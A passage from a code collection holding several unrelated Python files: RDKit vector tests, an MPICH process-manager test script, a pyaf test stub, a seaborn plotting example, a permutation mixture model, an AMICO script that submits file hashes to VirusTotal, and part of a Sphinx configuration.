self.assertRaises(ValueError, lambda : v1.__setitem__(5, 2))
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 30)
for i in range(len(v1)):
v1[i] = i%4;
self.assertTrue(len(v1) == 30)
for i in range(len(v1)):
self.assertTrue(v1[i] == i%4)
self.assertRaises(ValueError, lambda : v1.__setitem__(10, 6))
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE, 30)
for i in range(len(v1)):
v1[i] = i%16;
self.assertTrue(len(v1) == 30)
self.assertTrue(v1.GetTotalVal() == 211)
for i in range(len(v1)):
self.assertTrue(v1[i] == i%16)
self.assertRaises(ValueError, lambda : v1.__setitem__(10, 16))
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.EIGHTBITVALUE, 32)
for i in range(len(v1)):
v1[i] = i%256;
self.assertTrue(len(v1) == 32)
self.assertTrue(v1.GetTotalVal() == 496)
for i in range(len(v1)):
self.assertTrue(v1[i] == i%256)
self.assertRaises(ValueError, lambda : v1.__setitem__(10, 256))
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.SIXTEENBITVALUE, 300)
for i in range(len(v1)):
v1[i] = i%300;
self.assertTrue(len(v1) == 300)
self.assertTrue(v1.GetTotalVal() == 44850)
self.assertRaises(ValueError, lambda : v1.__setitem__(10, 65536))
def test2VectDistances(self):
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
for i in range(15):
v1[2*i] = 1
v2[2*i] = 1
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
for i in range(30):
if (i%3 == 0):
v2[i] = 1
else:
v2[i] = 0
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 15)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 30)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 30)
for i in range(30):
v1[i] = i%4
v2[i] = (i+1)%4
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 44)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE, 16)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE, 16)
for i in range(16):
v1[i] = i%16
v2[i] = i%5
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 90)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.EIGHTBITVALUE, 5)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.EIGHTBITVALUE, 5)
v1[0] = 34
v1[1] = 167
v1[2] = 3
v1[3] = 56
v1[4] = 128
v2[0] = 14
v2[1] = 67
v2[2] = 103
v2[3] = 6
v2[4] = 228
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 370)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.SIXTEENBITVALUE, 3)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.SIXTEENBITVALUE, 3)
v1[0] = 2345
v1[1] = 64578
v1[2] = 34
v2[0] = 1345
v2[1] = 54578
v2[2] = 10034
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 21000)
def test3Pickles(self):
#outF = file('dvvs.pkl','wb+')
with open(
os.path.join(RDConfig.RDBaseDir,
'Code/DataStructs/Wrap/testData/dvvs.pkl'),
'rb'
) as inF:
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
for i in range(15):
v1[2*i] = 1
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#cPickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 30)
for i in range(30):
v1[i] = i%4
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#pickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE, 16)
for i in range(16):
v1[i] = i%16
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#pickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.EIGHTBITVALUE, 5)
v1[0] = 34
v1[1] = 167
v1[2] = 3
v1[3] = 56
v1[4] = 128
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#pickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.SIXTEENBITVALUE, 3)
v1[0] = 2345
v1[1] = 64578
v1[2] = 34
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#pickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
def test4DiscreteVectOps(self):
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 8)
for i in range(4):
v1[2*i] = 2
self.assertTrue(v1.GetTotalVal()==8)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 8)
for i in range(4):
v2[2*i+1] = 2
v2[2*i] = 1
self.assertTrue(v2.GetTotalVal()==12)
v3 = v1|v2
self.assertTrue(len(v3)==len(v2))
self.assertTrue(v3.GetTotalVal()==16)
v3 = v1&v2
self.assertTrue(len(v3)==len(v2))
self.assertTrue(v3.GetTotalVal()==4)
v4 = v1+v2
self.assertTrue(len(v4)==len(v2))
self.assertTrue(v4.GetTotalVal()==20)
v4 = v1-v2
self.assertTrue(v4.GetTotalVal()==4)
v4 = v2-v1
self.assertTrue(v4.GetTotalVal()==8)
v4 = v2
v4 -= v1
self.assertTrue(v4.GetTotalVal()==8)
v4 -= v4
self.assertTrue(v4.GetTotalVal()==0)
def testIterator(self):
"""
connected to sf.net issue 1719831:
http://sourceforge.net/tracker/index.php?func=detail&aid=1719831&group_id=160139&atid=814650
"""
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
for i in range(15):
v1[2*i] = 1;
l1 = list(v1)
self.assertTrue(len(l1)==len(v1))
for i,v in enumerate(v1):
self.assertTrue(l1[i]==v)
self.assertRaises(IndexError,lambda :v1[40])
def test9ToNumpy(self):
import numpy
bv = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE,32)
bv[0]=1
bv[1]=4
bv[17]=1
bv[23]=8
bv[31]=12
arr = numpy.zeros((3,),'i')
ds.ConvertToNumpyArray(bv,arr)
for i in range(len(bv)):
self.assertEqual(bv[i],arr[i])
if __name__ == '__main__':
unittest.main()
|
AlexanderSavelyev/rdkit
|
Code/DataStructs/Wrap/testDiscreteValueVect.py
|
Python
|
bsd-3-clause
| 7,665
|
#!/usr/bin/env python
# (C) 2001 by Argonne National Laboratory.
# See COPYRIGHT in top-level directory.
#
# Note that I repeat code for each test just in case I want to
# run one separately. I can simply copy it out of here and run it.
# A single test can typically be chgd simply by altering its value(s)
# for one or more of:
# PYEXT, NMPDS, HFILE
import os, sys, commands
sys.path += [os.getcwd()] # do this once
print "odd tests---------------------------------------------------"
clusterHosts = [ 'bp4%02d' % (i) for i in range(0,8) ]
print "clusterHosts=", clusterHosts
MPIDir = "/home/rbutler/mpich2"
MPI_1_Dir = "/home/rbutler/mpich1i"
# test: singleton init (cpi)
print "TEST singleton init (cpi)"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['Process 0 of 1','pi is approximately 3']
rv = mpdtest.run(cmd="%s/examples/cpi" % (MPIDir), grepOut=1, expOut=expout )
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: bnr (mpich1-compat using cpi)
print "TEST bnr (mpich1-compat using cpi)"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['Process 0 on','Process 1 on','Process 2 on','pi is approximately 3']
rv = mpdtest.run(cmd="mpiexec%s -bnr -n 3 %s/examples/cpi" % (PYEXT,MPI_1_Dir),
grepOut=1, expOut=expout )
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST ^C to mpiexec"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
import popen2
runner = popen2.Popen4("mpiexec%s -n 2 infloop -p" % (PYEXT)) # -p => don't print
import time ## give the mpiexec
time.sleep(2) ## time to get going
os.system("kill -INT %d" % (runner.pid) ) # simulate user ^C
expout = ''
rv = mpdtest.run(cmd="mpdlistjobs%s #2" % (PYEXT), chkOut=1, expOut=expout )
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("killall -q infloop") ## just to be safe
# test:
print "TEST re-knit a ring"
PYEXT = '.py'
NMPDS = 3
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
import popen2, time
mpd1 = popen2.Popen4("mpd%s -l 12345" % (PYEXT))
time.sleep(2)
mpd2 = popen2.Popen4("mpd%s -n -h %s -p 12345" % (PYEXT,socket.gethostname()) )
mpd3 = popen2.Popen4("mpd%s -n -h %s -p 12345" % (PYEXT,socket.gethostname()) )
time.sleep(2)
rv = mpdtest.run(cmd="mpdtrace%s" % (PYEXT), chkOut=0 )
if len(rv['OUT']) != NMPDS:
print "a: unexpected number of lines of output from mpdtrace", rv['OUT']
sys.exit(-1)
hostname = socket.gethostname()
for line in rv['OUT']:
if line.find(hostname) < 0:
print "a: bad lines in output of mpdtrace", rv['OUT']
sys.exit(-1)
os.system("kill -9 %d" % (mpd3.pid) )
time.sleep(1)
rv = mpdtest.run(cmd="mpdtrace%s" % (PYEXT), chkOut=0 )
if len(rv['OUT']) != NMPDS-1:
print "b: unexpected number of lines of output from mpdtrace", rv['OUT']
sys.exit(-1)
hostname = socket.gethostname()
for line in rv['OUT']:
if line.find(hostname) < 0:
print "b: bad lines in output of mpdtrace", rv['OUT']
sys.exit(-1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
|
gnu3ra/SCC15HPCRepast
|
INSTALLATION/mpich2-1.4.1p1/src/pm/mpd/test/test5.py
|
Python
|
bsd-3-clause
| 3,936
|
import tests.missing_data.test_missing_data_air_passengers_generic as gen
gen.test_air_passengers_missing_data('DiscardRow', None)
|
antoinecarme/pyaf
|
tests/missing_data/test_missing_data_air_passengers_DiscardRow_None.py
|
Python
|
bsd-3-clause
| 132
|
"""
Paired density and scatterplot matrix
=====================================
_thumb: .5, .5
"""
import seaborn as sns
sns.set(style="white")
df = sns.load_dataset("iris")
g = sns.PairGrid(df, diag_sharey=False)
g.map_upper(sns.scatterplot)
g.map_lower(sns.kdeplot, colors="C0")
g.map_diag(sns.kdeplot, lw=2)
|
anntzer/seaborn
|
examples/pair_grid_with_kde.py
|
Python
|
bsd-3-clause
| 314
|
from __future__ import division, print_function, absolute_import
import numpy as np
import itertools as itr
import amitgroup as ag
from scipy.special import logit
from scipy.misc import logsumexp
from sklearn.base import BaseEstimator
import time
class PermutationMM(BaseEstimator):
"""
A Bernoulli mixture model with the option of a latent permutation. Each
sample gets transformed a number of times into a set of blocks. The
parameter space is similarly divided into blocks, which when trained
will represent the same transformations. The latent permutation
dictates what parameter block a sample block should be tested against.
n_components : int, optional
Number of mixture components. Defaults to 1.
permutations : int or array, optional
If integer, the number of permutations should be specified and a cyclic
permutation will be automatically built. If an array, each row is a
permutation of the blocks.
random_state : RandomState or an int seed (0 by default)
A random number generator instance
min_prob : float, optional
Floor for the minimum probability
thresh : float, optional
Convergence threshold.
n_iter : float, optional
Number of EM iterations to perform
n_init : int, optional
Number of random initializations to perform with
the best kept.
Attributes
----------
`weights_` : array, shape (`n_components`,)
Stores the mixing weights for each component
`means_` : array, shape (`n_components`, `n_features`)
Mean parameters for each mixture component.
`converged_` : bool
True when convergence was reached in fit(), False otherwise.
"""
def __init__(self, n_components=1, permutations=1, n_iter=20, n_init=1, random_state=0, min_probability=0.05, thresh=1e-8):
if not isinstance(random_state, np.random.RandomState):
random_state = np.random.RandomState(random_state)
self.random_state = random_state
self.n_components = n_components
if isinstance(permutations, int):
# Cycle through them
P = permutations
self.permutations = np.zeros((P, P))
for p1, p2 in itr.product(range(P), range(P)):
self.permutations[p1,p2] = (p1 + p2) % P
else:
self.permutations = np.asarray(permutations)
self.n_iter = n_iter
self.n_init = n_init
self.min_probability = min_probability
self.thresh = thresh
self.weights_ = None
self.means_ = None
def score_block_samples(self, X):
"""
Score complete camples according to the full model. This means that each sample
has all its blocks with the different transformations for each permutation.
Parameters
----------
X : ndarray
Array of samples. Must have shape `(N, P, D)`, where `N` are number
of samples, `P` number of permutations and `D` number of dimensions
(flattened if multi-dimensional).
Returns
-------
logprob : array_like, shape (n_samples,)
Log probabilities of each full data point in X.
log_responsibilities : array_like, shape (n_samples, n_components, n_permutations)
Log posterior probabilities of each mixture component and
permutation for each observation.
"""
N = X.shape[0]
K = self.n_components
P = len(self.permutations)
unorm_log_resp = np.empty((N, K, P))
unorm_log_resp[:] = np.log(self.weights_[np.newaxis])
for p in range(P):
for shift in range(P):
p0 = self.permutations[shift,p]
unorm_log_resp[:,:,p] += np.dot(X[:,p0], logit(self.means_[:,shift]).T)
unorm_log_resp+= np.log(1 - self.means_[:,self.permutations]).sum(2).sum(2)
logprob = logsumexp(unorm_log_resp.reshape((unorm_log_resp.shape[0], -1)), axis=-1)
log_resp = (unorm_log_resp - logprob[...,np.newaxis,np.newaxis]).clip(min=-500)
return logprob, log_resp
def fit(self, X):
"""
Estimate model parameters with the expectation-maximization algorithm.
Parameters are set when constructing the estimator class.
Parameters
----------
X : array_like, shape (n, n_permutations, n_features)
Array of samples, where each sample has been transformed `n_permutations` times.
"""
print(X.shape)
assert X.ndim == 3
N, P, F = X.shape
assert P == len(self.permutations)
K = self.n_components
eps = self.min_probability
max_log_prob = -np.inf
for trial in range(self.n_init):
self.weights_ = np.ones((K, P)) / (K * P)
# Initialize by picking K components at random.
repr_samples = X[self.random_state.choice(N, K, replace=False)]
self.means_ = repr_samples.clip(eps, 1 - eps)
#self.q = np.empty((N, K, P))
loglikelihoods = []
self.converged_ = False
for loop in range(self.n_iter):
start = time.clock()
# E-step
logprob, log_resp = self.score_block_samples(X)
resp = np.exp(log_resp)
log_dens = logsumexp(log_resp.transpose((0, 2, 1)).reshape((-1, log_resp.shape[1])), axis=0)[np.newaxis,:,np.newaxis]
dens = np.exp(log_dens)
# M-step
for p in range(P):
v = 0.0
for shift in range(P):
p0 = self.permutations[shift,p]
v += np.dot(resp[:,:,shift].T, X[:,p0])
self.means_[:,p,:] = v
self.means_ /= dens.ravel()[:,np.newaxis,np.newaxis]
self.means_[:] = self.means_.clip(eps, 1 - eps)
self.weights_[:] = (np.apply_over_axes(np.sum, resp, [0])[0,:,:] / N).clip(0.0001, 1 - 0.0001)
# Calculate log likelihood
loglikelihoods.append(logprob.sum())
ag.info("Trial {trial}/{n_trials} Iteration {iter} Time {time:.2f}s Log-likelihood {llh}".format(trial=trial+1,
n_trials=self.n_init,
iter=loop+1,
time=time.clock() - start,
llh=loglikelihoods[-1]))
if trial > 0 and abs(loglikelihoods[-1] - loglikelihoods[-2])/abs(loglikelihoods[-2]) < self.thresh:
self.converged_ = True
break
if loglikelihoods[-1] > max_log_prob:
ag.info("Updated best log likelihood to {0}".format(loglikelihoods[-1]))
max_log_prob = loglikelihoods[-1]
best_params = {'weights': self.weights_,
'means' : self.means_,
'converged': self.converged_}
self.weights_ = best_params['weights']
self.means_ = best_params['means']
self.converged_ = best_params['converged']
def predict_flat(self, X):
"""
Returns an array of which mixture component each data entry is
associate with the most. This is similar to `predict`, except it
collapses component and permutation to a single index.
Parameters
----------
X : ndarray
Data array to predict.
Returns
-------
components: list
An array of length `num_data` where `components[i]` indicates
the argmax of the posteriors. The permutation EM gives two indices, but
they have been flattened according to ``index * component + permutation``.
"""
logprob, log_resp = self.score_block_samples(X)
ii = log_resp.reshape((log_resp.shape[0], -1)).argmax(-1)
return ii
def predict(self, X):
"""
Returns a 2D array of which mixture component each data entry is associate with the most.
Parameters
----------
X : ndarray
Data array to predict.
Returns
-------
components: list
An array of shape `(num_data, 2)` where `components[i]` indicates
the argmax of the posteriors. For each sample, we have two values,
the first is the part and the second is the permutation.
"""
ii = self.predict_flat(X)
return np.vstack(np.unravel_index(ii, (self.n_components, len(self.permutations)))).T
|
jiajunshen/partsNet
|
pnet/permutation_mm.py
|
Python
|
bsd-3-clause
| 9,041
|
# Authors: Phani Vadrevu <pvadrevu@uga.edu>
# Roberto Perdisci <perdisci@cs.uga.edu>
import sys
from datetime import timedelta, date
import time
import simplejson
import logging
import logging.config
from config import *
import vt_api
import util
LOG_CONF_FILE = "logging.conf"
class VTSubmissions:
def __init__(self):
self.QUERY_RATE_LIMIT = 10
self.ONE_MIN = 60
logging.config.fileConfig(LOG_CONF_FILE)
self.logger = logging.getLogger("amico_logger")
#stdout_handler = logging.StreamHandler(sys.stdout)
#stdout_handler.setLevel(logging.DEBUG)
#formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s'
#'- %(message)s')
#stdout_handler.setFormatter(formatter)
#self.logger.addHandler(stdout_handler)
util.setup_socks()
self.conn = util.connect_to_db()
self.cursor = self.conn.cursor()
self.today = date.today().strftime("%Y-%m-%d")
self.yesterday = (date.today() -
timedelta(days=1)).strftime("%Y-%m-%d")
self.last_month = (date.today() -
timedelta(days=30)).strftime("%Y-%m-%d")
def get_hashes_from_db(self):
if vt_submissions == "manual":
hashes = self.get_hashes_from_db_manual()
elif vt_submissions == "live":
hashes = self.get_hashes_from_db_live()
else:
hashes = self.get_hashes_from_db_scans()
self.logger.debug("get_hashes_from_db(): Yesterday's hahses: %s", len(hashes))
self.hashes = self.update_hashes(hashes)
def update_hashes(self, hashes):
self.cursor.execute("""
SELECT distinct md5, sha1
FROM virus_total_submissions
WHERE (submit_time::date) = %s
""", (self.last_month,))
if self.cursor.rowcount > 0:
hashes = hashes.union(self.cursor.fetchall())
self.cursor.execute("""
SELECT distinct md5, sha1
FROM virus_total_submissions
WHERE (submit_time::date) > %s AND
(submit_time::date) < %s
""", (self.last_month, self.yesterday))
if self.cursor.rowcount > 0:
hashes = hashes.difference(self.cursor.fetchall())
self.cursor.execute("""
SELECT distinct md5, sha1
FROM virus_total_submissions
WHERE (submit_time::date) = %s
""", (self.today,))
if self.cursor.rowcount > 0:
hashes = hashes.difference(self.cursor.fetchall())
self.logger.debug("update_hashes(): Number of hashes: %s", len(hashes))
return hashes
def get_hashes_from_db_scans(self):
self.cursor.execute("""
SELECT distinct md5, sha1
FROM virus_total_scans
WHERE json IS NOT NULL AND
query_time::date = %s
""", (self.yesterday,))
if self.cursor.rowcount > 0:
hashes = set(self.cursor.fetchall())
else:
hashes = set()
return hashes
def get_hashes_from_db_live(self):
self.cursor.execute("""
SELECT distinct md5, sha1
FROM pe_dumps
WHERE sha1 IS NOT NULL AND
timestamp::date = %s
""", (self.yesterday,))
if self.cursor.rowcount > 0:
hashes = set(self.cursor.fetchall())
else:
hashes = set()
return hashes
def get_hashes_from_db_manual(self):
self.logger.debug("entered get_hashes_from_db_manual()")
self.cursor.execute("""
SELECT distinct md5, sha1
FROM manual_download_checksums
WHERE referer_exists = 'f' AND
sha1 IS NOT NULL AND
timestamp::date = %s
""", (self.yesterday,))
if self.cursor.rowcount > 0:
hashes = set(self.cursor.fetchall())
else:
hashes = set()
return hashes
def insert_scan(self, sha1, md5, response):
self.logger.debug("entered insert_scan()")
self.cursor.execute("""
INSERT INTO virus_total_submissions
(submit_time, sha1, md5, scan_id)
VALUES (LOCALTIMESTAMP, %s, %s, %s)
RETURNING vt_submit_id
""", (sha1, md5, response['scan_id']))
vt_submit_id = self.cursor.fetchone()[0]
self.cursor.execute("""
UPDATE virus_total_submissions
SET resubmit_id = %s
WHERE sha1= %s AND
submit_time::date = %s
""", (vt_submit_id, sha1, self.last_month))
def check_report_exists(self, sha1):
self.cursor.execute("""
SELECT * FROM virus_total_scans
WHERE sha1 = %s AND
scan_time IS NOT NULL""", (sha1, ))
report_exists = True if self.cursor.rowcount else False
self.cursor.execute("""
SELECT * FROM virus_total_submissions
WHERE sha1 = %s AND
json IS NOT NULL""", (sha1, ))
report_exists = True if self.cursor.rowcount else report_exists
return report_exists
def make_request(self, md5, sha1):
self.logger.debug("entered make_request()")
self.logger.debug("sha1: %s", sha1)
report_exists = self.check_report_exists(sha1)
self.logger.debug("report_exists: %s", report_exists)
json = None
try:
json = (vt_api.rescan_request(md5) if report_exists else
vt_api.send_file(md5))
if json:
response = simplejson.loads(json)
if response["response_code"] == 1:
self.insert_scan(sha1, md5, response)
return True
else:
self.logger.warning("make_request: Bad response code: %s",
response["response_code"])
else:
self.logger.warning("make_request: No JSON response")
except Exception as e:
self.logger.exception("report_exists: %s", report_exists)
self.logger.exception("json: %s", json)
self.logger.exception("sha1: %s", sha1)
self.logger.exception("make_request: Error %s", e)
return False
def submit_hashes(self):
self.logger.debug("entered submit_hashes()")
query_count = 0
done_hashes = set()
for md5, sha1 in self.hashes:
tries = 0
# This loop makes max 3 attempts to send a scan request
while tries <= 3:
if query_count == self.QUERY_RATE_LIMIT:
self.logger.debug(
"Query limit reached. Sleeping for a min.")
time.sleep(self.ONE_MIN)
query_count = 0
tries += 1
query_count += 1
if self.make_request(md5, sha1):
done_hashes.add((md5, sha1))
break
if len(self.hashes):
self.logger.debug("Submitted the hashes on: %s", date.today())
self.hashes.difference_update(done_hashes)
def update_table_with_report(self, scan_id, report, json):
self.logger.debug("entered update_table_with_report()")
scan_time = report["scan_date"]
scans = report["scans"]
num_av_labels = report["positives"]
trusted_av_labels = 0
for k, v in scans.iteritems():
if v["detected"] is True:
if k in trusted_av_vendors:
trusted_av_labels += 1
scan_time += " UTC"
self.cursor.execute("""
UPDATE virus_total_submissions
SET trusted_av_labels = %s,
num_av_labels = %s,
scan_time = TIMESTAMP WITH TIME ZONE %s,
json = %s
WHERE scan_id = %s and json is NULL""",
(trusted_av_labels, num_av_labels, scan_time,
json, scan_id))
def fetch_reports(self):
self.logger.debug("entered fetch_reports()")
self.cursor.execute("""
SELECT scan_id
FROM virus_total_submissions
WHERE json is NULL and
(LOCALTIMESTAMP - submit_time) > '5 minutes' and
(LOCALTIMESTAMP - submit_time) < '3 days'
ORDER BY submit_time ASC""")
scan_ids = [row[0] for row in self.cursor.fetchall()]
self.logger.debug("fetch_reports(): %s scan reports to be fetched",
len(scan_ids))
query_count = 0
for scan_id in scan_ids:
if query_count == self.QUERY_RATE_LIMIT:
self.logger.debug(
"Query limit reached. Sleeping for a min.")
time.sleep(self.ONE_MIN)
query_count = 0
query_count += 1
try:
json = vt_api.get_vt_report(scan_id)
if not json:
self.logger.debug("No json")
continue
report = simplejson.loads(json)
# Sometimes, we get the old reports wrongly
if (report["response_code"] != 1) or (
report['scan_id'] != scan_id):
self.logger.debug("Response code %s for scan_id %s" %
(report["response_code"], scan_id))
continue
self.update_table_with_report(scan_id, report, json)
except Exception as e:
self.logger.exception(
"Error in fetching report for scan_id %s: %s" % (scan_id, e))
continue
def sleep_for_the_day():
today = date.today()
while today == date.today():
time.sleep(15 * 60)
def vt_submissions_func():
vt_submit = VTSubmissions()
vt_submit.get_hashes_from_db()
while True:
try:
vt_submit.submit_hashes()
vt_submit.fetch_reports()
except Exception as e:
vt_submit.logger.exception(
"Unexpected error! %s \n Sleeping for the rest of the day", e)
sleep_for_the_day()
vt_submit.logger.debug("main(): Sleeping for 15 min.")
time.sleep(vt_submit.ONE_MIN * 15)
today = date.today().strftime("%Y-%m-%d")
if today != vt_submit.today:
vt_submit.today = today
vt_submit.yesterday = (date.today() -
timedelta(days=1)).strftime("%Y-%m-%d")
vt_submit.last_month = (date.today() -
timedelta(days=30)).strftime("%Y-%m-%d")
vt_submit.get_hashes_from_db()
if __name__ == "__main__":
vt_submissions_func()
|
phani-vadrevu/amico
|
amico_scripts/vt_submit.py
|
Python
|
bsd-3-clause
| 10,726
|
# -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
cwd = os.getcwd()
parent = os.path.dirname(cwd)
sys.path.append(parent)
import djangocms_markitup
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'djangocms-markitup'
copyright = u'2014, Iacopo Spalletti'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = djangocms_markitup.__version__
# The full version, including alpha/beta/rc tags.
release = djangocms_markitup.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
